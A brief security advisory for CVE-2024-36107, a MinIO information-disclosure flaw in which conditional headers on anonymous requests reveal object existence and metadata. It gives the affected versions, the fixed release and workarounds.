CVE-2024-36107

Name of the Vulnerable Software and Affected Versions MinIO versions prior to RELEASE.2024-05-27T19-17-46Z

Description The issue concerns the use of If-Modified-Since and If-Unmodified-Since headers with anonymous requests, allowing an attacker to determine if an object exists on the server in a specific bucket and gain access to information such as Last-Modified, Etag, x-amz-version-id, Expires, and Cache-Control metadata values. This conditional check was being honored before validating anonymous access, leading to potential information disclosure.

Recommendations For MinIO versions prior to RELEASE.2024-05-27T19-17-46Z: Upgrade to RELEASE.2024-05-27T19-17-46Z to fix the issue. As a temporary workaround, consider restricting anonymous access to metadata of objects to minimize the risk of exploitation. Avoid using the If-Modified-Since and If-Unmodified-Since headers with anonymous requests until the issue is resolved.